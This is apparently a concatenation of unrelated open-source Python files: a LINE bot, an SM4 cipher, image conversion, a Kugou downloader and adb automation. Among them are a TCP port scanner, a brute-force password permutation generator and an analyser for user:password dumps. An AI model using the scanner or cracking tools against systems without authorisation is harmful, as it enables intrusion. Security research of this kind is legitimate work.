app.logger.info('Request body: ' + body)
try:
handler.handle(body, signature)
except InvalidSignatureError:
abort(400)
return 'OK'
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
message = event.message.text
user_id = event.source.user_id
user_name = line.get_profile(user_id).display_name
print(f'Received message: \'{message}\' from {user_name}')
reply_content = create_reply_content(message, user_id)
line.reply_message(event.reply_token, reply_content)
``` |
{
"source": "0x10001/sm4",
"score": 3
} |
#### File: sm4/sm4/base.py
```python
import struct
from .compatibility import iter_range
from .core import derive_keys, encode_block
class SM4Key(object):
"""A class for encryption using SM4 Key"""
def __init__(self, key):
self.__encryption_key = guard_key(key)
self.__decryption_key = self.__encryption_key[::-1]
self.__key = key
def encrypt(self, message, initial=None, padding=False):
"""Encrypts the message with the key object.
:param message: {bytes} The message to be encrypted
:param initial: {union[bytes, NoneType]} The initial value, using CBC Mode when is not None
:param padding: {any} Uses PKCS5 Padding when TRUTHY
:return: {bytes} Encrypted bytes
"""
return handle(message, self.__encryption_key, initial, padding, 1)
def decrypt(self, message, initial=None, padding=False):
"""Decrypts the encrypted message with the key object.
:param message: {bytes} The message to be decrypted
:param initial: {union[bytes, NoneType]} The initial value, using CBC Mode when is not None
:param padding: {any} Uses PKCS5 Padding when TRUTHY
:return: {bytes} Decrypted bytes
"""
return handle(message, self.__decryption_key, initial, padding, 0)
def __hash__(self):
return hash((self.__class__, self.__encryption_key))
def guard_key(key):
if isinstance(key, bytearray):
key = bytes(key)
assert isinstance(key, bytes), "The key should be `bytes` or `bytearray`"
assert len(key) == 16, "The key should be of length 16"
return tuple(derive_keys(key))
def guard_message(message, padding, encryption):
assert isinstance(message, bytes), "The message should be bytes"
length = len(message)
if encryption and padding:
return message.ljust(length + 16 >> 4 << 4, chr(16 - (length & 15)).encode())
assert length & 15 == 0, (
"The length of the message should be divisible by 16"
"(or set `padding` to `True` in encryption mode)"
)
return message
def guard_initial(initial):
if initial is None:
return
if isinstance(initial, bytearray):
initial = bytes(initial)
assert isinstance(initial, bytes), "The initial value should be of type `bytes` or `bytearray`"
assert len(initial) & 15 == 0, "The initial value should be of length 16"
return struct.unpack(">IIII", initial)
def handle(message, key, initial, padding, encryption):
message = guard_message(message, padding, encryption)
initial = guard_initial(initial)
blocks = (struct.unpack(">IIII", message[i: i + 16]) for i in iter_range(0, len(message), 16))
if initial is None:
# ECB
encoded_blocks = ecb(blocks, key)
else:
# CBC
encoded_blocks = cbc(blocks, key, initial, encryption)
ret = b"".join(struct.pack(">IIII", *block) for block in encoded_blocks)
return ret[:-ord(ret[-1:])] if not encryption and padding else ret
def ecb(blocks, key):
for block in blocks:
yield encode_block(block, key)
def cbc(blocks, key, initial, encryption):
if encryption:
for block in blocks:
data = tuple(x ^ y for x, y in zip(block, initial))
initial = encode_block(data, key)
yield initial
else:
for block in blocks:
data = encode_block(block, key)
initial, block = block, tuple(x ^ y for x, y in zip(data, initial))
yield block
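# Minimal usage sketch for SM4Key (the key and IV bytes below are placeholders,
# not official test vectors):
#
#   key = SM4Key(b"0123456789abcdef")           # 16-byte key
#   ct = key.encrypt(b"secret", padding=True)   # ECB mode with PKCS5 padding
#   assert key.decrypt(ct, padding=True) == b"secret"
#   iv = b"fedcba9876543210"                    # passing a 16-byte IV selects CBC mode
#   ct_cbc = key.encrypt(b"secret", initial=iv, padding=True)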
``` |
{
"source": "0x1001/picture-box",
"score": 3
} |
#### File: picture-box/image_converter/convert.py
```python
import argparse
from PIL import Image
import os
WIDTH = 400
HEIGHT = 300
def convert_dir(path):
for root, dirs, files in os.walk(path):
for file_name in files:
if file_name.lower().endswith(".png") or file_name.lower().endswith(".jpg") or file_name.lower().endswith(".jpeg"):
convert(os.path.join(root, file_name))
def convert(path):
print("Processing: " + path)
im = Image.open(path)
im = _resize(im)
im = im.convert('1')
pixels = im.load()
im.save(os.path.join(os.path.dirname(path), "_" + os.path.splitext(os.path.basename(path))[0] + os.path.splitext(os.path.basename(path))[1]))
binary_image = bytearray(int(WIDTH*HEIGHT/8))
for i in range(WIDTH):
for j in range(HEIGHT):
if pixels[i, j] == 255:
binary_image[int((i + j * WIDTH) / 8)] |= 0x80 >> (i % 8)
#image[(x + y * this->width) / 8] |= 0x80 >> (x % 8);
else:
binary_image[int((i + j * WIDTH) / 8)] &= ~(0x80 >> (i % 8))
#image[(x + y * this->width) / 8] &= ~(0x80 >> (x % 8));
with open(os.path.splitext(path)[0] + ".bin", "wb") as fp:
fp.write(binary_image)
def _resize(im):
width, height = im.size
if 1.3 < width/height < 1.4:
raise Exception("Width or height of the picture is not supported: {0}x{1}".format(width, height))
    return im.resize((WIDTH, HEIGHT))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Converts any 4:3 image to Waveshare 4.2inc screen SRAM format.')
parser.add_argument('--path', "-p",
required=True,
type=str,
dest="path",
help='path to image file or to folder with images')
args = parser.parse_args()
if os.path.isfile(args.path):
convert(args.path)
elif os.path.isdir(args.path):
convert_dir(args.path)
``` |
{
"source": "0x10F8/Isker",
"score": 2
} |
#### File: Isker/api/api.py
```python
import requests
DATASOURCE = 'tranquility'
BASE_URL = 'https://esi.evetech.net'
RETRIES = 10
def build_url(version, path):
return BASE_URL + '/' + 'v' + str(version) + '/' + path
def do_get(version, path, params):
return do_get_retry(version, path, params, RETRIES)
def do_get_retry(version, path, params, retries_remaining):
    if retries_remaining <= 0:
        return None  # retries exhausted
    url = build_url(version, path)
    params['datasource'] = DATASOURCE
    try:
        response = requests.get(url=url, params=params).json()
    except Exception:
        response = do_get_retry(version, path, params, (retries_remaining - 1))
    return response
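# Usage sketch of the retry wrapper (the endpoint path is an assumption made
# for illustration, not a verified ESI route):
#
#   status = do_get(2, 'status/', {})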
``` |
{
"source": "0x10F8/PasswordAnalyser",
"score": 3
} |
#### File: 0x10F8/PasswordAnalyser/analyse.py
```python
from sys import argv
from palogging import palog
from panalyser import analysistools
from pafiletools import filetools
from paprogressbar import progressbar
from json import dumps
from concurrent.futures import ThreadPoolExecutor
import sys
# Check arguments
if len(argv) < 3:
palog.log("usage: {0} <input_list> <output_file>".format(argv[0]))
exit(1)
# Gather the input and output file
INPUT_PASSWORD_LIST = argv[1]
OUTPUT_FILE = argv[2]
# Create a list of the analysis methods we will use
analysis_methods = [analysistools.get_zxcvbn_analysis,
analysistools.get_hibp_analysis,
analysistools.get_character_types_used]
process_pool = ThreadPoolExecutor(max_workers=50)
seperators = [':', ';', '|']
def get_indexes_of_seperators(line):
indexes = {}
for seperator in seperators:
indexes[seperator] = line.find(seperator)
return indexes
def pick_seperator(indexes):
    seperator = None
    seperatorIndex = sys.maxsize
    for key in indexes.keys():
        if 0 < indexes[key] < seperatorIndex:
            seperatorIndex = indexes[key]  # track the smallest index; otherwise the last match would win
            seperator = key
    return seperator
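# Worked example of the separator selection above (hypothetical input line):
#   get_indexes_of_seperators("user42:hunter2") -> {':': 6, ';': -1, '|': -1}
#   pick_seperator({':': 6, ';': -1, '|': -1})  -> ':'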
def do_analysis(user_id, password):
info_dict = {"user_id": user_id}
for analysis_method in analysis_methods:
info_dict.update(analysis_method(password))
output = dumps(info_dict)
return output
def start_analysis():
# Get the number of passwords to analyse
passwords_count = filetools.count_lines(INPUT_PASSWORD_LIST)
palog.log("Analysing {0} passwords".format(passwords_count))
results = []
password_index = 0
# Do the analysis
with open(OUTPUT_FILE, "w", 10000000, encoding="utf8") as data_list:
with open(INPUT_PASSWORD_LIST, 'r', 1024, encoding="utf8", errors="ignore") as password_list:
while True:
# Get a password from the list
line = filetools.clean_input(password_list.readline())
# Stop analysis if we are done
if not line:
break
if line and len(line) > 0 and line[0] in seperators:
line = line[1:]
indexes = get_indexes_of_seperators(line)
seperator = pick_seperator(indexes)
tokenized = line.split(seperator, 1)
user_id = tokenized[0]
password = tokenized[1]
if password is not None and len(password) > 0:
results.append(process_pool.submit(
do_analysis, user_id, password))
for result in results:
data_list.writelines(result.result() + "\n")
password_index += 1
# every 20th password update the progress bar
if password_index % 20 == 0:
progressbar.print_progress(
password_index, passwords_count, 50)
process_pool.shutdown()
progressbar.print_progress(passwords_count, passwords_count, 50)
print("")
palog.log("Finished analysis")
if __name__ == "__main__":
start_analysis()
```
#### File: PasswordAnalyser/paprogressbar/progressbar.py
```python
def print_progress(current, maximum, length):
completed = int(float(current)/float(maximum) * float(length))
completed_string = "#" * completed
uncompleted_string = "." * (length - completed)
clear_progress(length+2)
print("[{0}{1}]".format(completed_string, uncompleted_string), end='')
def clear_progress(length):
print("\b" * length, end='')
``` |
{
"source": "0x10F8/PCrack",
"score": 3
} |
#### File: PCrack/perm/permutations.py
```python
class Permutations:
def __init__(self, charset, max_length):
self._charset = charset
self._max_length = max_length
self._current_length = 1
self.__generate_indexes()
def set_current_length(self, current_length):
self._current_length = current_length
def set_current_indexes(self, current_indexes):
self._current_indexes = current_indexes
    def __generate_indexes(self):
        self._current_indexes = [0] * self._current_length
        # Compare index lists directly: joining the digits into a string is
        # ambiguous once the charset has 11 or more characters.
        self._max_indexes = [len(self._charset) - 1] * self._current_length
def has_next(self):
return self._current_length <= self._max_length
def next(self):
next_output = ''.join([self._charset[i] for i in self._current_indexes])
if self.__is_max_indexes():
self._current_length += 1
self.__generate_indexes()
else:
self.__increment_indexes()
return next_output
def __increment_indexes(self):
for i in range(0, len(self._current_indexes)):
if self._current_indexes[i] == len(self._charset) - 1:
self._current_indexes[i] = 0
else:
self._current_indexes[i] = self._current_indexes[i] + 1
return
    def __is_max_indexes(self):
        return self._current_indexes == self._max_indexes
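# Usage sketch (demo only): enumerates every string over the charset up to
# max_length, in charset-index order.
if __name__ == "__main__":
    p = Permutations("ab", 2)
    while p.has_next():
        print(p.next())  # a, b, aa, ba, ab, bb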
``` |
{
"source": "0x10F8/pscan",
"score": 3
} |
#### File: 0x10F8/pscan/pscan.py
```python
from socket import socket, AF_INET, SOCK_STREAM, gethostbyname
from optparse import OptionParser, IndentedHelpFormatter
import logging
import sys
from concurrent.futures import ThreadPoolExecutor
from pings import Ping
''' The minimum port number '''
MIN_PORT = 1
''' The maximum port number '''
MAX_PORT = 65535
''' All ports '''
ALL_PORT_RANGE = [i for i in range(MIN_PORT, MAX_PORT + 1)]
''' The number of pings to use to determine if a host is up (through ICMP pings) '''
HOST_UP_PING_COUNT = 1
''' Default timeout for various actions throughout the script '''
DEFAULT_TIMEOUT = 1
''' Default number of worker threads to use when port scanning '''
DEFAULT_WORKER_THREADS = 1000
# Configure the logger to info
logging.basicConfig(format="%(message)s", level=logging.INFO)
class InvalidPortError(Exception):
"""
Raise this error when a port is outwith the ALL_PORT_RANGE limits
"""
def __init__(self, port):
self.port = port
class InvalidHostError(Exception):
"""
Raise this error where a host name cannot be resolved
"""
def __init__(self, host):
self.host = host
class InvalidPortFormatError(Exception):
"""
Raise this error if the port argument doesn't match the required format
"""
def __init__(self, port_string):
self.port_string = port_string
def is_host_up_icmp(host, timeout=DEFAULT_TIMEOUT):
"""
    Checks whether a host is up. If the host specified is a resolvable hostname rather than an IP address,
    the method will first try to resolve the host name; if this fails, an InvalidHostError will be raised.
    Next a single ping is sent to the host, and if this ping receives a valid response then the method
    returns True.
    Note that a host might have ICMP responses disabled, so this cannot be taken as 100% accurate.
:param host: The host to check
:param timeout: The maximum time to wait on the ping response
:return: Boolean True if the host responds to ping requests and has a valid host name tupled with the IP address
"""
try:
ip = gethostbyname(host)
except:
raise InvalidHostError(host)
response = ping_host(host, timeout, HOST_UP_PING_COUNT)
if response.packet_lost is None:
return True, ip
return False, None
def ping_host(host, timeout, count):
"""
Sends ping requests to a host.
:param host: The host to ping
:param timeout: The maximum time to wait on a ping
:param count: The number of pings to send
:return: Response object containing the ping information
"""
ping = Ping(timeout=(timeout * 1000))
return ping.ping(host, count)
def is_port_open(host, port, timeout=DEFAULT_TIMEOUT):
"""
Check if a specified remote host:port combination (socket) is listening.
This will attempt to create a socket to the specified remote host and port, if the connection
occurs then a tuple with the host, port and True should be returned almost instantly.
    The socket connection attempt will wait for the specified timeout (default 1 second) before
returning a tuple with the host, port and False.
:param host: The remote address
:param port: The remote port
:param timeout: The timeout to wait for the socket connection (default 1s optional)
:return: A tuple in the format (host, port, is_open) where open is a boolean Value
"""
logging.debug("Scanning port %d" % port)
if port not in ALL_PORT_RANGE:
raise InvalidPortError(port)
try:
with socket(AF_INET, SOCK_STREAM) as sock:
sock.settimeout(timeout)
sock.connect((host, port))
return host, port, True
except:
return host, port, False
def scan_port_range(host, ports, timeout=DEFAULT_TIMEOUT, worker_threads=DEFAULT_WORKER_THREADS):
"""
    Scan a port range on a host. This method will scan all of the ports in the ports list for the specified
    host using the is_port_open(host, port, timeout) method. If the socket does not connect within the timeout specified
it is marked as down. The process is multi-threaded and the maximum pool size is defined by the worker_threads
parameter.
:param host: The host to scan
:param ports: The ports to scan on the host
:param timeout: The timeout to wait until marking a port as down
:param worker_threads: The maximum number of threads to pool to execute the work
:return: Returns a list of tuples (host, port, is_open) where open is a Boolean value
"""
thread_pool = ThreadPoolExecutor(max_workers=worker_threads)
thread_results = []
results = []
for port in ports:
thread_results.append(thread_pool.submit(is_port_open, host, port, timeout))
for future in thread_results:
results.append(future.result())
thread_pool.shutdown()
return results
def filter_results(results, filter_function):
"""
Filter the results using a function on the result tuple.
:param results: The results list
:param filter_function: A function which acts upon a result tuple and returns True or False
:return: A list of results tuples where filter_function(result) is true for each member
"""
return [result for result in results if filter_function(result)]
def open_port_filter(result):
"""
Returns true if the specified result tuple is for an open port.
:param result: The result tuple (host, port, is_open)
:return: True or False depending on the is_open flag
"""
_, _, is_open = result
return is_open
def parse_port_string(port_string):
"""
This method will take a string of ports and port ranges from the passed user parameter and
attempt to generate a list of port integers in order and without duplicates.
:param port_string: The user input port string
:return: list of int's containing the ports to scan
"""
# Tokenize string by commas to find ranges
tokenized_by_comma = port_string.split(',')
# Find all port ranges (seperated by dashes) in tokenized values
ranges = [token for token in tokenized_by_comma if '-' in token]
# Find all non port ranges
str_ports = [token for token in tokenized_by_comma if '-' not in token]
# Add all string ports to the final port list and convert to ints
try:
ports = [int(port) for port in str_ports]
except:
# If the integer conversion failed then something weird was entered as a port
raise InvalidPortFormatError(str_ports)
# Convert string port ranges to the full list of int ports to scan
for port_range in ranges:
# Remove whitespace
port_range_trim = port_range.replace(' ', '')
# Tokenize by dash
tokenized_by_dash = port_range_trim.split('-')
# At this point we need to convert the range to integers and do some validation
# If there is not 2 numbers in the range then the user has entered something weird!
if len(tokenized_by_dash) != 2:
raise InvalidPortFormatError(port_range)
# If the 2 tokens are not integers then the user has entered something weird!
try:
from_port = int(tokenized_by_dash[0])
to_port = int(tokenized_by_dash[1])
except:
raise InvalidPortFormatError(port_range)
# If the from_port is not before the to_port then the user has entered something weird!
if from_port >= to_port:
raise InvalidPortFormatError(port_range)
        for port in range(from_port, to_port + 1):  # inclusive, so "1-100" really scans port 100
ports.append(port)
    # remove duplicates (there might be some, since ranges can overlap or ports can repeat in comma-separated lists)
ports = list(set(ports))
# sort from lowest to highest
ports.sort()
return ports
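# Worked example of the parsing above:
#   parse_port_string("1-3,5,5") -> [1, 2, 3, 5]
# (the range is expanded inclusively, duplicates removed, result sorted)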
def get_service(port):
"""
TODO: implement a port to service mapping
:param port: the port to get the service for
:return: service name typically found on this port
"""
return 'NYI' # Not Yet Implemented
def pad_line(line, target_length, padding_char=' '):
"""
Pad a line to the desired length
:param line: The line to pad
:param target_length: The target length
:param padding_char: The padding char, defaults to space
:return: The padded string
"""
line = str(line)
extra = target_length - len(line)
padding = padding_char * extra
return line + padding
def print_results(results):
"""
Prints the results in a standard format and column length.
:param results: The results
:return: nothing
"""
# Setup target column count per header
port_cols = 12
state_cols = 9
service_cols = 10
# Setup headers
port_header = pad_line("PORT", port_cols)
state_header = pad_line("STATE", state_cols)
service_header = pad_line("SERVICE", service_cols)
# print header
print(" %s%s%s" % (port_header, state_header, service_header))
# print results
for result in results:
_, port, is_open = result
service = get_service(port)
print(" %s%s%s" % (pad_line(port, port_cols),
pad_line(("OPEN" if is_open else "CLOSED"), state_cols),
pad_line(service, service_cols)))
class PScanHelpFormatter(IndentedHelpFormatter):
"""Custom formatter to allow new lines in the epilog
"""
def __init__(self,
indent_increment=2,
max_help_position=24,
width=None,
short_first=1):
IndentedHelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_epilog(self, epilog):
if epilog:
return "\n" + epilog + "\n"
else:
return ""
# Do option parsing
option_parser = OptionParser(usage="%prog -H <target_host> -p <target_port / port_range>",
formatter=PScanHelpFormatter())
option_parser.epilog = \
"""Examples:
{0} -H example.com -p 80
{0} -H example.com -p 80,443
{0} -H example.com -p 1-100
{0} -H example.com -p 1-100,443 -t 2
""".format(sys.argv[0])
option_parser.add_option('-H', dest='target_host', type='string', help='specify a target host')
option_parser.add_option('-p', dest='target_ports', type='string', help='specify a target port[s] / port range :')
option_parser.add_option('-t', dest='timeout', type='int', default=DEFAULT_TIMEOUT,
help='specify a timeout (seconds) to wait on socket '
'connection. Connections that take longer than'
' this are considered closed (DEFAULT: 1s)')
options, args = option_parser.parse_args()
target_host = options.target_host
target_port_string = options.target_ports
user_timeout = options.timeout
# Check arguments have been given
if target_host is None or target_port_string is None:
print("You must specify a target host and port[s]")
option_parser.print_usage()
exit(0)
# Parse ports from string arguments
try:
target_ports = parse_port_string(target_port_string)
except InvalidPortFormatError:
print("Invalid port parameter format")
exit(0)
if not (len(target_ports) > 0):
logging.error("You must specify a target host and port[s]")
option_parser.print_usage()
exit(0)
# Check if the host is up (resolving the address if necessary) and output a relevant message
try:
up, ip = is_host_up_icmp(target_host)
except InvalidHostError:
print("Host %s could not be resolved" % target_host)
exit(0)
if up:
print("Host %s(%s) is up" % (target_host, ip))
else:
print("Host %s is down or not responding to ICMP requests" % target_host)
# Do the port scanning
try:
open_ports = filter_results(scan_port_range(target_host, target_ports, user_timeout), open_port_filter)
except InvalidPortError as e:
print("Invalid port number %d" % e.port)
exit(0)
# Print the results
print_results(open_ports)
``` |
{
"source": "0x110100/you-get",
"score": 3
} |
#### File: you_get/extractors/kugou.py
```python
__all__ = ['kugou_download']
from ..common import *
from json import loads
from base64 import b64decode
import re
import hashlib
def kugou_download(url, output_dir=".", merge=True, info_only=False, **kwargs):
if url.lower().find("5sing")!=-1:
#for 5sing.kugou.com
html=get_html(url)
ticket=r1(r'"ticket":\s*"(.*)"',html)
j=loads(str(b64decode(ticket),encoding="utf-8"))
url=j['file']
title=j['songName']
songtype, ext, size = url_info(url)
print_info(site_info, title, songtype, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge=merge)
elif url.lower().find("hash")!=-1:
return kugou_download_by_hash(url,output_dir,merge,info_only)
else:
#for the www.kugou.com/
return kugou_download_playlist(url, output_dir=output_dir, merge=merge, info_only=info_only)
# raise NotImplementedError(url)
def kugou_download_by_hash(url,output_dir = '.', merge = True, info_only = False):
#sample
#url_sample:http://www.kugou.com/song/#hash=93F7D2FC6E95424739448218B591AEAF&album_id=9019462
hash_val = match1(url,'hash=(\w+)')
album_id = match1(url,'album_id=(\d+)')
html = get_html("http://www.kugou.com/yy/index.php?r=play/getdata&hash={}&album_id={}".format(hash_val,album_id))
    j = loads(html)
    url = j['data']['play_url']
    title = j['data']['audio_name']
    # some songs can't be played because of copyright protection
    if url == '':
        return
songtype, ext, size = url_info(url)
print_info(site_info, title, songtype, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge=merge)
def kugou_download_playlist(url, output_dir = '.', merge = True, info_only = False, **kwargs):
urls=[]
#download music leaderboard
#sample: http://www.kugou.com/yy/html/rank.html
    if url.lower().find('rank') != -1:
        html = get_html(url)
        pattern = re.compile('<a href="(http://.*?)" data-active=')
        res = pattern.findall(html)
        for song in res:
            page = get_html(song)  # do not reuse `res` here; it is the list being iterated
            pattern_url = re.compile(r'"hash":"(\w+)".*"album_id":(\d+)')  # (\d)+ only captured the last digit
            hash_val, album_id = pattern_url.findall(page)[0]
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(hash_val,album_id))
# download album
# album sample: http://www.kugou.com/yy/album/single/1645030.html
elif url.lower().find('album')!=-1:
html = get_html(url)
pattern = re.compile('var data=(\[.*?\]);')
res = pattern.findall(html)[0]
        for v in loads(res):  # `loads` is imported from json above
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v['hash'],v['album_id']))
# download the playlist
# playlist sample:http://www.kugou.com/yy/special/single/487279.html
else:
html = get_html(url)
pattern = re.compile('data="(\w+)\|(\d+)"')
for v in pattern.findall(html):
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v[0],v[1]))
print('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v[0],v[1]))
#download the list by hash
for url in urls:
kugou_download_by_hash(url,output_dir,merge,info_only)
site_info = "kugou.com"
download = kugou_download
# download_playlist = playlist_not_supported("kugou")
download_playlist=kugou_download_playlist
``` |
{
"source": "0x11111111/ArknightsAssistant",
"score": 3
} |
#### File: ArknightsAssistant/deprecated/send_tap.py
```python
import os
import time
from deprecated import deprecated
@deprecated(version='0.2.1', reason='The class is merged into adb.py_auto_play')
class SendTap:
"""A broker for events like sending taps.
Attribute:
specific_device:
"""
def __init__(self, specific_device):
self.specific_device = specific_device
def tap(self, position, delay=0):
if delay:
time.sleep(delay)
os.system("adb -s {} shell input tap {} {}".format(self.specific_device, position[0], position[1]))
```
#### File: 0x11111111/ArknightsAssistant/pap_adb.py
```python
import os
import time
import logging
from PIL import Image
import cv2
import numpy as np
from typing import Union, Optional
logger = logging.getLogger('py_auto_play_adb_main')
class PyAutoPlay_adb():
"""This is the main class of PyAutoPlay containing most of the utilities interacting with window content and user.
The instance of this class serves as a broker to handle screenshot, resize, conversion, recognition and
implementation of actions.
Attributes:
id (str): A str indicating the device identity.
title (str): The title of window.
ratio (double): Ratio is set to height of original picture to standard one's. It is used to resize and
relocation.
template_name (list): A list containing the pictures to be recognized. The pictures are provided in str of their
file name and will be called by cv2.imread() to form templates.
template_path (str): A str indicating the path of template pictures.
tmp_path (str): A str indicating the path of temporary directory, which stores the temporary pictures captured.
img_type (str): A str indicating the format of pictures processed. Default and recommendation is 'PNG'.
std_height (int): A int representing the standard height of picture to be processed. The value is related with
the height of template original picture's full size. Because this program can handle with pictures from
different devices with unique size, it need a height as a standard in which all the pictures processed are
resized to it. We recommend the height of the picture which the templates are cropped from.
precondition (list): A list storing the preconditions required to be satisfied when an event is detected.
The records are stored in an individual dict.
[
{
'event': (str): If the event is detected and needs to perform an action before its precondition is
satisfied. For example, we need to check an agreement before we continue to perform actions.
The check of agreement is the precondition of the actions performing. The 'event' is given by
its file name and should be included in template_name list and located in template_path.
'precondition': (str): The precondition to be satisfied initially. Given by its file name and
required to be located in template_path.
'warning': (str): If the precondition failed to be satisfied, a warning will be issued and uttered
via the result of recognition.
}
]
adb_path (str): A str indicating the current path of 'adb.exe'.
"""
def __init__(self, template_name, precondition, adb_path, template_path='..\\adb\\template\\', tmp_path='..\\adb\\tmp\\',
img_type='PNG', std_height=810):
self.logger = logging.getLogger('py_auto_play_adb_main')
self.logger.info('Initialing.')
self.id = None
self.title = ''
self.ratio = 1
self.template_name = template_name
self.template_path = template_path
self.tmp_path = tmp_path
self.img_type = img_type
self.std_height = std_height
self.precondition = precondition
self.adb_path = adb_path
self.__template_dict = dict()
self.__precondition_dict = dict()
answer = os.popen('{} devices'.format(self.adb_path))
self.logger.info(answer.read())
self.logger.info('Creating templates.')
# Generate the templates stored in __template_dict.
for template in self.template_name:
template_full_path = self.template_path + template
self.__template_dict[template] = cv2.imread(template_full_path, cv2.IMREAD_COLOR)
self.logger.info('Creating precondition list.')
# Traverse the list of precondition and fetch the record dict. Then generate the binding information in
# __precondition_dict.
for record in self.precondition:
template_full_path = self.template_path + record['precondition']
            if not record['event'] in self.__precondition_dict:
                self.__precondition_dict[record['event']] = [{'template': cv2.imread(template_full_path, 1),
                                                              'warning': record['warning']}]
            else:
                self.__precondition_dict[record['event']].append({'template': cv2.imread(template_full_path, 1),
                                                                  'warning': record['warning']})
def get_all_title_id(self) -> dict:
"""Obtain all the names of devices and their serial numbers.
Returns:
dict: A dict that holds both the serial number(str) and its name of devices.
"""
self.logger.info('Calling get_all_title_id.')
title_id = dict()
device_list = []
get_devices = os.popen('{} devices'.format(self.adb_path))
cmd_output = get_devices.read()
self.logger.info(cmd_output)
for line in cmd_output.splitlines():
if line.endswith('device'):
device_list.append(line[:line.find('\t')])
for device in device_list:
get_titles = os.popen('{} -s {} shell getprop ro.product.brand'.format(self.adb_path, device))
title = get_titles.read().strip()
title_id[title] = device
self.logger.info(title_id)
return title_id
def set_port(self, port):
"""Attempt to connect 127.0.0.1:{port}.
Args:
port (int): a port number of the emulator.
Returns:
dict: A dict that holds both the serial number(str) and its name of devices.
"""
os.popen('{} connect 127.0.0.1:{}'.format(self.adb_path, port))
return self.get_all_title_id()
def set_id(self, id):
"""Set the Attribute self.id to id.
Args:
id (str): a serial number of a device.
Returns:
None
"""
self.logger.info('Calling set_id.')
self.id = id
def sleep(self, _time):
"""Encapsulation of time.sleep().
Args:
_time (int): time to sleep in seconds.
Returns:
None
"""
time.sleep(_time)
def get_screenshot(self) -> Image.Image:
"""Get a screenshot from self.id device and adapt it.
The method will place the temporary image into self.tmp_path.
        The temporary image is converted when needed because of the platform nuances of '\r\n' and '\r'.
After that, the image is resized according to self.std_height, by default, 810. Meanwhile self.ratio is set to
height of original picture to standard one's.
Returns:
Image.Image: a image object to be recognized.
"""
self.logger.info('Calling get_screenshot.')
if not os.path.exists(self.tmp_path):
os.mkdir(self.tmp_path)
# Pid is used to distinguish from different threads.
screenshot_path = self.tmp_path + 'screenshot_' + str(os.getpid()) + '.' + self.img_type.lower()
# The following command should be 'exec-out', which should neglect the replacement of '\r\n' and '\r'.
# However, most of the tested adb doesn't work out as definition so 'shell' is used here.
os.system('{} -s {} shell screencap -p > {}'.format(self.adb_path, self.id, screenshot_path))
with open(screenshot_path, 'rb') as f:
original_pic = f.read()
converted_pic = None
if original_pic[4:8] == b'\r\r\r\n':
converted_pic = original_pic.replace(b'\r\r\n', b'\n')
self.logger.info('Converted \\r\\r\\r\\n.')
elif original_pic[4:7] == b'\r\r\n':
converted_pic = original_pic.replace(b'\r\n', b'\n')
self.logger.info('Converted \\r\\r\\n.')
elif original_pic[4:6] == b'\r\n':
converted_pic = original_pic
self.logger.info('No convertion.')
with open(screenshot_path, 'wb') as f:
f.write(converted_pic)
f.close()
# The method copy assigned a replica to im and the original image has no reference to it. So it can be safely deleted.
im = Image.open(screenshot_path).copy()
original_size = im.size
if original_size[1] == self.std_height:
self.ratio = 1
self.logger.info('Screenshot ratio == 1.')
else:
self.ratio = original_size[1] / self.std_height
self.logger.info('Screenshot ratio == {}.'.format(self.ratio))
converted_size = (int(original_size[0] / self.ratio), int(original_size[1] / self.ratio))
im = im.resize(converted_size)
im.save(screenshot_path, self.img_type)
# Temporary screenshot shall be removed after initialization. Because the file name is generated by the pid of
# python program and differs from each run. If left unattended, tmp directory will be piled up with pngs.
os.remove(screenshot_path)
return im
def recognize(self, image) -> dict:
"""A function that serves as recognizer between screenshots and template pictures.
Args:
image (Image.Image):
Returns:
dict: A result of recognition.
{
'precondition': (bool): Only occurs when the image in template is also included in
precondition['event']. True if the condition is satisfied and false otherwise.
'warning': (list): Only occurs when the image in template is also included in precondition['event'].
If satisfied, value is a an empty list and if not, a list including warning information in
precondition['warning'] is provided.
'template': (str): The name of the template detected.
'position': (tuple):((int, int), (int, int)) A rectangular area defined by its left top and bottom
right coordination. Mind that the coordination is matched to the resized picture and need to be
relocated according to self.ratio.
'confidence': (double): The extent to which the template matches the certain target in screenshot.
Usually values over 0.95 if a match is detected.
}
"""
self.logger.info('Calling recognize.')
im = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
image.close()
recognition_res_dict = dict()
for template_name in self.template_name:
template = self.__template_dict[template_name]
width, height, _ = template.shape[::]
tmp_recognition_res = cv2.matchTemplate(im, template, eval('cv2.TM_CCOEFF_NORMED'))
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(tmp_recognition_res)
top_left = max_loc
confidence = max_val
            # confidence is used to decide whether a certain template picture was recognized.
if confidence < 0.9:
continue
else:
if template_name in self.__precondition_dict:
recognition_res_dict['precondition'] = True
recognition_res_dict['warning'] = []
for precondition in self.__precondition_dict[template_name]:
tmp_precondition_res = cv2.matchTemplate(im, precondition['template'],
eval('cv2.TM_CCOEFF_NORMED'))
_, max_val, _, _ = cv2.minMaxLoc(tmp_precondition_res)
if max_val > 0.9:
pass
else:
recognition_res_dict['precondition'] = False
recognition_res_dict['warning'].append(precondition['warning'])
bottom_right = (top_left[0] + height, top_left[1] + width)
recognition_res_dict['template'] = template_name
recognition_res_dict['position'] = ((top_left[0] + bottom_right[0]) // 2,
(top_left[1] + bottom_right[1]) // 2)
recognition_res_dict['confidence'] = confidence
return recognition_res_dict
def send_action(self, position, action=None, delay=0):
"""Action to perform, by default a click on position after delay.
Args:
position (tuple): A coordination indicating the position to be tapped. Will be masked if position in
action[3] is given.
action (list): Special action(s) to be performed.
delay (int): Time to sleep (now).
Returns:
None
"""
self.logger.info('Calling send_action.')
if delay:
self.sleep(delay)
# Special action is by default None and only in this case a tap on position is sent directly.
if action is None:
os.system('{} -s {} shell input tap {} {}'.format(self.adb_path, self.id, position[0], position[1]))
else:
# If action[3](position) is especially designated and not equal to (0, 0),
# the given position in parameter list will be shaded.
if action[3] and not (action[3][0], action[3][1]) == (0, 0):
position = action[3]
# If action[0](key) is empty str, nothing will happen except for sleep delay.
if not action[0]:
if action[1]:
self.sleep(action[1])
            # If action[0](key) is 'click', a click is sent action[2] times after waiting
            # action[1](delay) seconds.
